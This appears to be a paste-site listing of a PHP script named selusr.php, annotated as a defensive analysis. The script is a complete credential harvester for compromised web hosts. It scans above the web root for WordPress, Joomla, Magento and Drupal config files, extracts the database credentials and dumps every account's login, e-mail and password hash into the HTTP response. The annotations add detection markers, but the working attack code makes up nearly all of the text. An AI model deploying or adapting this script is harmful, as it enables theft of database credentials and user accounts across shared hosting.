PalmaSolutions

selusr.php

Apr 18th, 2018
  1. <?php
  // Reviewer annotation (defensive analysis; the code below is unchanged).
  // What this script does when it is requested over HTTP:
  //   1. looks for CMS configuration files (wp-config.php, configuration.php,
  //      app/etc/env.php or local.xml, sites/default/settings.php), starting
  //      from directories above the web root;
  //   2. reads the database host, name, user and password out of each file;
  //   3. connects with those credentials and prints every row of the CMS
  //      user table (login, e-mail, password column) into the response.
  // Strings usable for detection: the response marker "explOK12345" and result
  // lines shaped CMSTYPE:url:login:email:password<br>.
  // If this file is found on a host, treat the database credentials in every
  // config file it could read, and all account password hashes, as disclosed.
  2.  
  3. /****find config files****/
  // Base directory: DOCUMENT_ROOT when the server provides it, otherwise the
  // script's own directory cut off after the first "htdocs", "httpdocs" or "www".
  4. $rootpath = "";
  5. if(isset($_SERVER["DOCUMENT_ROOT"]))
  6. {
  7. $rootpath = $_SERVER["DOCUMENT_ROOT"];
  8. } else
  9. {
  10. $rootpath = preg_replace('/(htdocs|httpdocs|www)(.*)/','$1',dirname($_SERVER["SCRIPT_FILENAME"]));
  11. }
  12.  
  13.  
  // Split the base path into components; the separator ("/" or "\") is
  // inferred from the path itself.
  14. $pathArr =array();
  15. $startPath="";
  16. $depth=0;
  17. $sep = "/";
  18. if (strstr($rootpath,"/"))
  19. {
  20. $pathArr = explode("/",$rootpath);
  21. } elseif (strstr($rootpath,"\\"))
  22. {
  23. $pathArr = explode("\\",$rootpath);
  24. $sep = "\\";
  25. }
  26. $depth = count($pathArr);
  // Walk the path from its top component downward: each pass extends $startPath
  // by one component, scans it with findconfig(), and lowers the depth limit by
  // one. The walk stops at the first prefix that yields any config path.
  // The scan therefore begins above the document root; other sites readable by
  // the PHP process fall inside it, which is where per-site filesystem
  // isolation (separate OS users, open_basedir) limits the exposure.
  27. if($depth>=2)
  28. {
  29. $startPath = $pathArr[0];
  30. for($i=1;$i<count($pathArr)-1;$i++)
  31. {
  32. $startPath = $startPath.$sep.$pathArr[$i];
  33. $configs=findconfig($startPath,$depth);
  34. if(count($configs))
  35. {
  36. break;
  37. }
  38. $depth--;
  39.  
  40. }
  41. } else
  42. {
  43. $startPath = $rootpath;
  44. $configs=findconfig($startPath,$depth);
  45. }
  46.  
  47.  
  // Fallback when nothing was found: scan the base directory itself with a
  // depth limit of 2.
  48. if(count($configs)<=0)
  49. {
  50. $configs=findconfig($rootpath,2);
  51. }
  // $addOk records whether the marker line has already been printed.
  52. $addOk = false;
  53. if(is_array($configs))
  54. {
  55. $configs = array_unique($configs);
  56. foreach($configs as $config)
  57. {
  58. try{
  59.  
  60. $addedUsrs = NULL;
  // The whole config file is read into memory; the parser is then chosen by a
  // substring match on the file path.
  61. $cont = file_get_contents($config);
  62. $cmstype = "";
  63. if (stripos($config,"wp-config.php"))
  64. {
  65. $addedUsrs=setWPUser($cont);
  66. $cmstype = "WORDPRESS";
  67.  
  68.  
  69. } elseif(stripos($config,"configuration.php"))
  70. {
  71. $addedUsrs=setJMUser($cont);
  72. $cmstype = "JOOMLA";
  73.  
  74. } elseif(stripos($config,"local.xml"))
  75. {
  76. $addedUsrs=setMGUser($cont,false);
  77. $cmstype = "MAGENTO";
  78. } elseif(stripos($config,"env.php"))
  79. {
  80. $addedUsrs=setMGUser($cont,true);
  81. $cmstype = "MAGENTO";
  82. } elseif(stripos($config,"settings.php"))
  83. {
  84. $addedUsrs=setDPUser($cont,true);
  85. $cmstype = "DRUPAL";
  86. }
  // A parser returns an array only when it read at least one account row.
  87. if(is_array($addedUsrs))
  88. {
  89. try
  90. {
  // When the parser found no site URL, the config file path is printed instead.
  91. $url = $addedUsrs["url"];
  92. if(empty($url))
  93. {$url=$config;}
  // Fixed marker, written once before the first result line. It can be matched
  // in HTTP response bodies and in copies of this file on disk.
  94. if(!$addOk)
  95. {
  96. $addOk = true;
  97. echo "explOK12345" ;
  98. echo "<br>";
  99. }
  // One output line per account: CMSTYPE:url:login:email:password.
  100. if(is_array($addedUsrs["data"]))
  101. {
  102. foreach ($addedUsrs["data"] as $usr)
  103. {
  104. echo $cmstype.":".$url.":".$usr."<br>";
  105. }
  106. }
  107.  
  108.  
  109. }catch(Exception $e)
  110. { echo $e->getMessage();}
  111. // echo "<br>";
  112.  
  113. }
  // Exceptions raised while handling one config file are discarded silently.
  114. }catch(Exception $e)
  115. {;}
  116.  
  117.  
  118. }
  119.  
  120. }
  121.  
  // Self-deletion is present but commented out, so the script file stays on
  // disk after it has run.
  122. //unlink($_SERVER["SCRIPT_FILENAME"]);
  123.  
  124. // search for configs
  /**
   * Collects the paths of known CMS configuration files under $source.
   *
   * Recorded entries:
   *  - files named configuration.php or wp-config.php;
   *  - env.php, or else local.xml, inside a directory whose path contains "app/etc";
   *  - settings.php inside a directory whose path contains "sites/default".
   *
   * @param string $source directory to scan; resolved with realpath() first
   * @param int    $depth  value passed to setMaxDepth() on the recursive iterator
   * @return array list of config-file paths, empty when nothing matched
   */
  125. function findconfig($source,$depth)
  126. {
  127.  
  128. $source = str_replace('\\', '/', realpath($source));
  129. $result=array();
  130. try
  131. {
  132. if (is_dir($source) === true)
  133. {
  // CATCH_GET_CHILD: a subdirectory that cannot be opened is skipped instead of
  // aborting the whole walk.
  134. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source,RecursiveDirectoryIterator::KEY_AS_PATHNAME), RecursiveIteratorIterator::SELF_FIRST,RecursiveIteratorIterator::CATCH_GET_CHILD);
  135. $files->setMaxDepth($depth);
  136. foreach ($files as $file => $fileInfo)
  137. {
  138. try{
  // $file2 keeps the path as iterated; $file becomes the resolved path.
  139. $file = str_replace('\\', '/', $file);
  140. $file2 = $file;
  // Skip the "." and ".." entries.
  141. if( in_array(substr($file, strrpos($file, '/')+1), array('.', '..')) )
  142. continue;
  143. $file = realpath($file);
  144.  
  // Joomla and WordPress configs are matched by exact file name.
  145. if ((is_file($file) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
  146. {
  147. $result[]=$file;
  148.  
  // Magento: any directory whose iterated path contains "app/etc"; env.php is
  // preferred over local.xml when both exist.
  149. } elseif(is_dir($file)&&strstr($file2,"app/etc"))
  150. {
  151. //
  152. //local.xml
  153. if(file_exists(realpath($file."/env.php")))
  154. {
  155. $result[]= realpath($file."/env.php");
  156. }
  157. elseif(file_exists(realpath($file."/local.xml")))
  158. {
  159. $result[]= realpath($file."/local.xml");
  160. }
  161.  
  // Drupal: settings.php inside any directory whose iterated path contains
  // "sites/default".
  162. }elseif(is_dir($file)&&strstr($file2,"sites/default"))
  163. {
  164. //
  165. //local.xml
  166. if(file_exists(realpath($file."/settings.php")))
  167. {
  168. $result[]= realpath($file."/settings.php");
  169. }
  170.  
  171. }
  // A failure on a single entry is ignored and the walk continues.
  172. }catch(Exception $iterex)
  173. {
  174. ;
  175. }
  176. }
  177. }
  // Branches taken when $source is not a directory; they repeat the name and
  // path checks of the loop body.
  178. elseif ((is_file($source) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
  179. {
  180.  
  181. $result[]=$file;
  182. } elseif(is_dir($file)&&stristr($file,"app/etc"))
  183. {
  184. if(file_exists(realpath($file."/env.php")))
  185. {
  186. $result[]= realpath($file."/env.php");
  187. }
  188. elseif(file_exists(realpath($file."/local.xml")))
  189. {
  190. $result[]= realpath($file."/local.xml");
  191. }
  192. }elseif(is_dir($file)&&strstr($file2,"sites/default"))
  193. {
  194. //
  195. //local.xml
  196. if(file_exists(realpath($file."/settings.php")))
  197. {
  198. $result[]= realpath($file."/settings.php");
  199. }
  200.  
  201. }
  // Any exception from the scan is swallowed; whatever was collected so far is
  // still returned.
  202. } catch (Exception $e) {
  203. ;
  204. }
  205.  
  206.  
  207.  
  208.  
  209. return $result;
  210. }
  211.  
  212.  
  /**
   * Reads WordPress database settings from the text of a wp-config.php file and
   * returns the site URL plus the rows of the users table.
   *
   * Despite the "set" in its name, the function only issues SELECT statements.
   *
   * @param string $cont full content of the config file
   * @return array|null array("url" => siteurl option, "data" => list of
   *                    "user_login:user_email:user_pass" strings) when at least
   *                    one user row was read; otherwise nothing is returned
   */
  213. function setWPUser($cont)
  214. {
  215. $db_name = NULL;
  216. $db_user = NULL;
  217. $db_pass = NULL;
  218. $db_host= NULL;
  219. $tbl_preffix="";
  220. $db_preffix="";
  221. $uri="";
  // Captures define('NAME', 'value') pairs; only the single-quoted form matches.
  222. preg_match_all('/(define\(\')([^\']+)(\',\s*\')([^\']+)/', $cont, $matches);
  223. if(is_array($matches))
  224. {
  // Constant names are compared case-insensitively, by substring.
  225. for($i=0;$i<count($matches[2]);$i++)
  226. {
  227. if(stristr($matches[2][$i],"DB_NAME"))
  228. {$db_name=$matches[4][$i];}
  229. elseif(stristr($matches[2][$i],"db_user"))
  230. {$db_user=$matches[4][$i];}
  231. elseif(stristr($matches[2][$i],"db_password"))
  232. {$db_pass=$matches[4][$i];}
  233. elseif(stristr($matches[2][$i],"db_host"))
  234. {$db_host=$matches[4][$i];}
  235.  
  236. }
  237. if(!empty($db_name))
  238. {
  // The table prefix comes from the $table_prefix = '...' assignment.
  239. preg_match('/(\$table_prefix\s*=\s*\')([^\']+)/', $cont, $mpreffix);
  240. if(is_array($mpreffix)&&count($mpreffix)==3)
  241. {$tbl_preffix=$mpreffix[2];}
  // Only the legacy mysql_* API is used. Where mysql_connect() does not exist
  // (the extension was removed in PHP 7.0) the function falls through and
  // returns nothing.
  242. if(function_exists('mysql_connect')){
  // "@" suppresses the connection warning, so a failed attempt leaves no PHP
  // warning behind; database-side connection logs still record it.
  243. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
  244. if(mysql_select_db($db_name,$con_mss))
  245. {
  // Site address, taken from the options table.
  246. $result = mysql_query ("SELECT option_value FROM ".$tbl_preffix."options where option_name='siteurl' ", $con_mss);
  247. if($result)
  248. {
  249. $row = mysql_fetch_row($result);
  250. if(is_array($row)&&count($row)>0)
  251. $uri=trim($row[0]);
  252.  
  253. }
  254.  
  // Full read of the users table: login, e-mail and password column.
  255. $ErrorMsg = "";
  256. $result2 = mysql_query ("SELECT user_login,user_email,user_pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
  257. if (!$ErrorMsg){
  258. if (mysql_num_rows($result2)>0){
  259. while ($row = mysql_fetch_row($result2)){
  260. $usrArray[] = $row[0].":".$row[1].":".$row[2];
  261. }
  262. return Array("url"=>$uri,"data"=>$usrArray) ;
  263. }
  264. }
  265.  
  266.  
  267.  
  268. }
  269. }
  270. }
  271. }
  272. }
  273. }
  274.  
  /**
   * Reads Joomla database settings from the text of a configuration.php file and
   * returns the rows of the users table.
   *
   * Despite the "set" in its name, the function only issues a SELECT statement.
   *
   * @param string $cont full content of the config file
   * @return array|null array("url" => value of $sitename, "data" => list of
   *                    "username:email:password" strings) when at least one
   *                    user row was read; otherwise nothing is returned
   */
  275. function setJMUser($cont)
  276. {
  277. $db_name = NULL;
  278. $db_user = NULL;
  279. $db_pass = NULL;
  280. $db_host= NULL;
  281. $tbl_preffix="";
  282. $uri="";
  // Captures $name = 'value'; assignments; only the single-quoted form matches.
  283. preg_match_all('/(\$\w+\s*=\s*\')([^\']+)(\'\s*\;)/', $cont, $matches);
  284. if(is_array($matches))
  285. {
  // Variable names are compared case-insensitively, by substring. The "url"
  // slot is filled from $sitename, i.e. the site's name, not its address.
  286. for($i=0;$i<count($matches[1]);$i++)
  287. {
  288. if(stristr($matches[1][$i],"\$db "))
  289. {$db_name=$matches[2][$i];}
  290. elseif(stristr($matches[1][$i],"\$user "))
  291. {$db_user=$matches[2][$i];}
  292. elseif(stristr($matches[1][$i],"\$password"))
  293. {$db_pass=$matches[2][$i];}
  294. elseif(stristr($matches[1][$i],"\$host"))
  295. {$db_host=$matches[2][$i];}
  296. elseif(stristr($matches[1][$i],"\$dbprefix"))
  297. {$tbl_preffix=$matches[2][$i];}
  298. elseif(stristr($matches[1][$i],"\$sitename"))
  299. {$uri=$matches[2][$i];}
  300.  
  301. }
  302. if(!empty($db_name))
  303. {
  // Only the legacy mysql_* API is used. Where mysql_connect() does not exist
  // (the extension was removed in PHP 7.0) the function falls through and
  // returns nothing.
  304. if(function_exists('mysql_connect')){
  // "@" suppresses the connection warning, so a failed attempt leaves no PHP
  // warning behind; database-side connection logs still record it.
  305. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
  306. if(mysql_select_db($db_name,$con_mss))
  307. {
  308.  
  // Full read of the users table: username, e-mail and password column.
  309. $ErrorMsg = "";
  310. $result2 = mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
  311. if (!$ErrorMsg){
  312. if (mysql_num_rows($result2)>0){
  313. while ($row = mysql_fetch_row($result2)){
  314. $usrArray[] = $row[0].":".$row[1].":".$row[2];
  315. }
  316. return Array("url"=>$uri,"data"=>$usrArray) ;
  317. }
  318. }
  319.  
  320.  
  321.  
  322. }
  323. }
  324. }
  325. }
  326. }
  327. }
  328.  
  /**
   * Reads Magento database settings from the text of a config file and returns
   * the base URL plus the rows of the admin_user table.
   *
   * Despite the "set" in its name, the function only issues SELECT statements.
   *
   * @param string $cont  full content of the config file
   * @param bool   $ismg2 false: parse $cont as XML (the caller passes this for
   *                      local.xml); true: parse 'key' => 'value' pairs (the
   *                      caller passes this for env.php)
   * @return array|null array("url" => web/unsecure/base_url value, "data" =>
   *                    list of "username:email:password" strings) when at least
   *                    one row was read; otherwise nothing is returned
   */
  329. function setMGUser($cont,$ismg2)
  330. {
  331. $db_name = NULL;
  332. $db_user = NULL;
  333. $db_pass = NULL;
  334. $db_host= NULL;
  335. $tbl_preffix="";
  336. $uri="";
  337. $roletbl="";
  338.  
  // XML form: connection settings are read from
  // global/resources/default_setup/connection, the table prefix from
  // global/resources/db/table_prefix.
  339. if(!$ismg2&&stristr($cont,"<?xml version"))
  340. {
  341. $dbdata = new SimpleXMLElement($cont);
  342. $db_name = $dbdata->global->resources->default_setup->connection->dbname;
  343. $db_user = $dbdata->global->resources->default_setup->connection->username;
  344. $db_pass = $dbdata->global->resources->default_setup->connection->password;
  345. $db_host= $dbdata->global->resources->default_setup->connection->host;
  346. $tbl_preffix=$dbdata->global->resources->db->table_prefix;
  347.  
  // PHP-array form: every single-quoted 'key' => 'value' pair in the file is
  // captured, and keys are compared case-insensitively, by substring.
  348. } elseif($ismg2&&stristr($cont,"'host' =>"))
  349. {
  350. //'host' => 'localhost',
  351. preg_match_all('/(\')(\w+)(\'\s*\=\>\s*\')([^\']+)/', $cont, $matches);
  352. if(is_array($matches))
  353. {
  354. for($i=0;$i<count($matches[2]);$i++)
  355. {
  356. if(stristr($matches[2][$i],"dbname"))
  357. {$db_name=$matches[4][$i];}
  358. elseif(stristr($matches[2][$i],"username"))
  359. {$db_user=$matches[4][$i];}
  360. elseif(stristr($matches[2][$i],"password"))
  361. {$db_pass=$matches[4][$i];}
  362. elseif(stristr($matches[2][$i],"host"))
  363. {$db_host=$matches[4][$i];}
  364. elseif(stristr($matches[2][$i],"table_prefix"))
  365. {$tbl_preffix=$matches[4][$i];}
  366.  
  367. }
  368. }
  369.  
  370. }
  371. if(!is_null($db_name)&&!empty($db_name))
  372. {
  // Only the legacy mysql_* API is used. Where mysql_connect() does not exist
  // (the extension was removed in PHP 7.0) the function falls through and
  // returns nothing.
  373. if(function_exists('mysql_connect')){
  // "@" suppresses the connection warning, so a failed attempt leaves no PHP
  // warning behind; database-side connection logs still record it.
  374. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
  375. if(mysql_select_db($db_name,$con_mss))
  376. {
  // Store base URL, taken from core_config_data.
  377. $result = mysql_query ("SELECT value FROM ".$tbl_preffix."core_config_data where path='web/unsecure/base_url' ", $con_mss);
  378. if($result)
  379. {
  380. $row = mysql_fetch_row($result);
  381. if(is_array($row)&&count($row)>0)
  382. $uri=trim($row[0]);
  383.  
  384. }
  385.  
  // Full read of the admin_user table: username, e-mail and password column.
  386. $ErrorMsg = "";
  387. $result2 = mysql_query ("SELECT username,email,password FROM ".$tbl_preffix."admin_user", $con_mss) or $ErrorMsg = mysql_error();
  388. if (!$ErrorMsg){
  389. if (mysql_num_rows($result2)>0){
  390. while ($row = mysql_fetch_row($result2)){
  391. $usrArray[] = $row[0].":".$row[1].":".$row[2];
  392. }
  393. return Array("url"=>$uri,"data"=>$usrArray) ;
  394. }
  395. }
  396.  
  397. }
  398. }
  399. }
  400. }
  401.  
  402.  
  403.  
  404.  
  405. }
  406.  
  /**
   * Reads Drupal database settings from the text of a settings.php file and
   * returns the site name plus the rows of the users table.
   *
   * Despite the "set" in its name, the function only issues SELECT statements.
   * The function declares one parameter; any further argument passed by a
   * caller is ignored.
   *
   * @param string $cont full content of the config file
   * @return array|null array("url" => unserialized site_name value, "data" =>
   *                    list of "name:mail:pass" strings) when at least one user
   *                    row was read; otherwise nothing is returned
   */
  407. function setDPUser($cont)
  408. {
  409. $db_name = NULL;
  410. $db_user = NULL;
  411. $db_pass = NULL;
  412. $db_host= NULL;
  413. $tbl_preffix="";
  414. $uri="";
  415. $roletbl="";
  416.  
  417. if(stristr($cont,"'host' =>"))
  418. {
  419. //'host' => 'localhost',
  // Captures 'key' => 'value' pairs that begin a line after leading whitespace
  // (multi-line mode); keys are compared case-insensitively, by substring.
  420. preg_match_all('/^(\s+\')(\w+)(\'\s*\=\>\s*\')([^\']+)/m', $cont, $matches);
  421. if(is_array($matches))
  422. {
  423. for($i=0;$i<count($matches[2]);$i++)
  424. {
  425. if(stristr($matches[2][$i],"database"))
  426. {$db_name=$matches[4][$i];}
  427. elseif(stristr($matches[2][$i],"username"))
  428. {$db_user=$matches[4][$i];}
  429. elseif(stristr($matches[2][$i],"password"))
  430. {$db_pass=$matches[4][$i];}
  431. elseif(stristr($matches[2][$i],"host"))
  432. {$db_host=$matches[4][$i];}
  433. elseif(stristr($matches[2][$i],"prefix"))
  434. {$tbl_preffix=$matches[4][$i];}
  435.  
  436. }
  437. }
  438.  
  439. }
  440. if(!is_null($db_name)&&!empty($db_name))
  441. {
  // Only the legacy mysql_* API is used. Where mysql_connect() does not exist
  // (the extension was removed in PHP 7.0) the function falls through and
  // returns nothing.
  442. if(function_exists('mysql_connect')){
  // "@" suppresses the connection warning, so a failed attempt leaves no PHP
  // warning behind; database-side connection logs still record it.
  443. if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
  444. if(mysql_select_db($db_name,$con_mss))
  445. {
  // Site name from the variable table; the stored value is handed to
  // unserialize() exactly as it was read from the database.
  446. $result = mysql_query ("SELECT value FROM ".$tbl_preffix."variable where name='site_name' ", $con_mss);
  447. if($result)
  448. {
  449. $row = mysql_fetch_row($result);
  450. if(is_array($row)&&count($row)>0)
  451. $uri= unserialize(trim($row[0]));
  452.  
  453. }
  454.  
  // Full read of the user table: name, e-mail and password column. If the
  // query on "users" fails, "users_field_data" is tried instead (presumably
  // covering an older and a newer Drupal schema; confirm).
  455. $ErrorMsg = "";
  456. $result2 = mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users", $con_mss) or $ErrorMsg = mysql_error();
  457.  
  458. if ($ErrorMsg)
  459. {
  460. $ErrorMsg = "";
  461. $result2 = mysql_query ("SELECT name,mail,pass FROM ".$tbl_preffix."users_field_data", $con_mss) or $ErrorMsg = mysql_error();
  462. }
  463. if (!$ErrorMsg){
  464. if (mysql_num_rows($result2)>0){
  465. while ($row = mysql_fetch_row($result2)){
  466. $usrArray[] = $row[0].":".$row[1].":".$row[2];
  467. }
  468. return Array("url"=>$uri,"data"=>$usrArray) ;
  469. }
  470. }
  471.  
  472.  
  473. }
  474. }
  475. }
  476. }
  477. }
  478.  
  479. ?>